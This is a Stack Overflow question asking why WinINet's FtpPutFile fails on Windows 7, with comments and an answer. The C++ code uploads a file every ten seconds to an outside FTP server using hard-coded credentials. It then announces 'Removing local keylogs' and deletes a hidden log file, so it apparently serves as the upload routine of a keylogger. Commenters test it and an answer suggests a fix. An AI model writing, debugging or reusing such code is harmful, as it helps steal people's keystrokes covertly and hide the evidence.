# C++ WinINet FtpPutFile Error 12003

Tags: c++, wininet

I've researched this problem for the last 3 days, for 8-10 hours a day. I've tried doing many other methods for uploading files, I've tried other libraries, etc.. But I cannot figure out anything.

It works 100% on the latest version of Windows 8.1, but when I test it on Windows 7 or earlier, I get Error 12003 when using FtpPutFile.

Every other WinINet FTP function works on every version of Windows, except for FtpPutFile.

I have Googled this topic for at least a total of 24 hours. (Literally)

I've had many different theories, I've tested them all, and nothing worked.

I thought, maybe it's the file/folder name parsing. So I messed around with that, nope. Didn't work.

I thought maybe it's a firewall problem, I ran as administrator and disabled the firewall, nope.

I've tried countless of other things.. Nothing has worked.

Here's my code. I'm using Visual Studio Express 2013.

```
#include "stdafx.h"
using namespace std;
#include <iostream>
#include <istream>
#include <windows.h>
#include <winuser.h>
#include <string>
#include <stdio.h>
#include <ctype.h>
#include <conio.h>
#include <time.h>
#include <wininet.h> 
#include <fstream>
#include <direct.h>
#include <tchar.h>
#include <ctime>
#include <sstream>
#pragma comment (lib, "urlmon")
#pragma comment(lib, "Wininet")

void main(){
    while (1){
        void send();
        send();
        Sleep(10000);
    }
}

void send(){
    void FileSubmit();
    FileSubmit();
}

void FileSubmit()
{
    bool folderExists(string str);
    cout << "Sending file..." << endl;
    HINTERNET hInternet;
    HINTERNET hFtpSession;
    hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (hInternet == NULL)
    {
        cout << "Error: " << GetLastError() << endl;
        cout << InternetGetLastResponseInfo << endl;
    }
    else
    {
        hFtpSession = InternetConnect(hInternet, "cloud9ips.com", INTERNET_DEFAULT_FTP_PORT, "ftptest@cloud9ips.com", "Pass123", INTERNET_SERVICE_FTP, 0, 0);
        if (hFtpSession == NULL)
        {
            cout << "Error: " << GetLastError() << endl;
            cout << InternetGetLastResponseInfo << endl;
        }
        else
        {
            string folder_path = "/testfolder/";
            string file_name = "testfile.txt";
            cout << "file_name: " << file_name << endl;
            cout << "folder_path: " << folder_path << endl;
            if (!folderExists(folder_path)){
                if (FtpCreateDirectory(hFtpSession, folder_path.c_str())){
                    cout << "Created folder for IP " + folder_path << endl;
                }
                else {
                    cout << "Error creating folder " + folder_path << endl;
                }
            }
            else {
                cout << "Folder already exists" << endl;
            }
            BOOL SetDir = FtpSetCurrentDirectory(hFtpSession, folder_path.c_str());
            if (SetDir){
                cout << "Set directory to " << folder_path << endl;
            }
            else {
                cout << "Failed to set directory to " << folder_path << endl;
            }
            BOOL Rename = FtpRenameFile(hFtpSession, "testfile.txt", "new.txt");
            if (Rename){
                cout << "Successfully renamed testfile.txt to new.txt" << endl;
            }
            else {
                cout << "Failed to rename file" << endl;
            }
            BOOL Transfer = FtpPutFile(hFtpSession, "C://folder/file.txt", file_name.c_str(), FTP_TRANSFER_TYPE_BINARY, 0);
            if (!Transfer)
            {
                cout << "Failed to send file." << endl;
                cout << "Error: " << GetLastError() << endl;
                cout << "Response Info: " << InternetGetLastResponseInfo << endl;
            }
            else {
                cout << "Successfully sent file." << endl;
            }
            cout << "Closing FTP Session" << endl;
            InternetCloseHandle(hFtpSession); // Close hFtpSession
        }
    }
    cout << "Closing connection" << endl;
    InternetCloseHandle(hInternet); // Close hInternet
    cout << "Removing local keylogs..." << endl;
    remove("C://system/sys.txt");
    cout << "Done!" << endl;
}

bool folderExists(string folder){
    IStream* pStream = NULL;
    string url = "http://cloud9ips.com/ftpadmin/" + folder + "/";
    URLOpenBlockingStream(0, url.c_str(), &pStream, 0, 0);
    if (!pStream)
        return false;
    pStream->Release();
    return true;
}
```

Am I doing something wrong?

I've included an FTP account's information inside of the code, so you may test it if you'd like.

I've looked over everything, I can't figure it out..

If you could help, I'd greatly appreciate it.

Thanks -Alex Benoit.

Comment: If anyone here has Windows 7, it'd help me so much if you'd test this and see if it works for you. I'm using Visual Studio 2013. Just start a new project and pop in my code.

Comment: I tried it on win8.1 but I get 12002 - timeout

Comment: @marcin_j Thank you for testing. Sorry, the old code didn't have any FTP information in it. Try using the new code if you wouldn't mind testing again. I edited my post.

Comment: I have tested your new code, and on win7 sendfile ends with success. I have compiled it on win8.1 32bit with vs2013, in non unicode app.

Comment: Hm. That's weird. How are you running it in Windows 7? Are you using Visual Studio to run the "Local Windows Debugger" or are you running it as a pre-built .exe file?

Comment: let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/48561/discussion-between-alex-benoit-and-marcin-j)

Answer (score 0):

It is a path error, not due to `INTERNET_FLAG_PASSIVE` flag.

My solution below :

```
pFtpConnection->SetCurrentDirectory(yourpath);
```

If the path `yourpath` not exists, create the path first;
then

```
pFtpConnection->PutFile(localFullFileName,sRemoteFile);
```